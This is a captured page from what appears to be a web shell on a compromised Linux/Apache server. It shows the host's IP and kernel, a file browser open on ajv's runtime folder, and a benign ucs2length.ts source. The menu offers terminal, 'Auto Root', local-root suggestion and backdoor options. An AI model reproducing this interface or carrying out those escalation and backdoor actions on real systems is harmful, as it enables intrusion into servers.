Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
ajv /
lib /
runtime /
Delete
Unzip
Name
Size
Permission
Date
Action
equal.ts
236
B
-rw-r--r--
2023-12-16 08:36
parseJson.ts
4.34
KB
-rw-r--r--
2023-12-16 08:36
quote.ts
802
B
-rw-r--r--
2023-12-16 08:36
re2.ts
157
B
-rw-r--r--
2023-12-16 08:36
timestamp.ts
1.46
KB
-rw-r--r--
2023-12-16 08:36
ucs2length.ts
629
B
-rw-r--r--
2023-12-16 08:36
uri.ts
160
B
-rw-r--r--
2023-12-16 08:36
validation_error.ts
336
B
-rw-r--r--
2023-12-16 08:36
Save
Rename
// https://mathiasbynens.be/notes/javascript-encoding // https://github.com/bestiejs/punycode.js - punycode.ucs2.decode export default function ucs2length(str: string): number { const len = str.length let length = 0 let pos = 0 let value: number while (pos < len) { length++ value = str.charCodeAt(pos++) if (value >= 0xd800 && value <= 0xdbff && pos < len) { // high surrogate, and there is a next character value = str.charCodeAt(pos) if ((value & 0xfc00) === 0xdc00) pos++ // low surrogate } } return length } ucs2length.code = 'require("ajv/dist/runtime/ucs2length").default'